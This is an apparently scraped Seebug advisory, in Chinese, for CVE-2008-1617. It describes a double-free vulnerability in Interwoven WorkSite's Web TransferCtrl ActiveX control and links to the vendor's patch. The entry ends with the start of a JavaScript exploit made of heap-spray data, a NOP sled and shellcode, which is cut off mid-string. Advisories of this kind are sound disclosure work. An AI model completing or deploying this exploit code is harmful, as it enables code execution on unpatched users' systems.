Lucene search
RootSSV:3157HistoryApr 13, 2008 - 12:00 a.m.
Interwoven WorkSite Web TransferCtrl Class控件双重释放漏洞
2008-04-1300:00:00
Root
www.seebug.org
20
EPSS
0.043
Percentile
92.3%
BUGTRAQ ID: 28628
CVE(CAN) ID: CVE-2008-1617
Worksite是Interwoven发布的文档和邮件管理解决方案。
Worksite的iManFile.cab文件所安装的Web TransferCtrl Class ActiveX控件(CLSID:4BECECDE-E494-4f69-A3DE-DA0B77726307)在处理Server属性时存在双重释放漏洞。如果用户受骗访问了恶意站点的话,就可以触发这个漏洞,导致执行任意指令。
Interwoven WorkSite 8.2
Interwoven
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
<a href=“http://worksitesupport.interwoven.com” target=“_blank”>http://worksitesupport.interwoven.com</a>
<script>
var data = unescape("%ud4b4%u0013")+unescape("%u1111%u1111");
var nop = unescape("%u9090");
var shellcode = "%uc033%u5050%u6a9
Related
prion
prion
Double free
2008-04-08 18:05:00
cvelist
cvelist
CVE-2008-1617
2008-04-08 18:00:00
cve
cve
CVE-2008-1617
2008-04-08 18:05:00
nvd
nvd
CVE-2008-1617
2008-04-08 18:05:00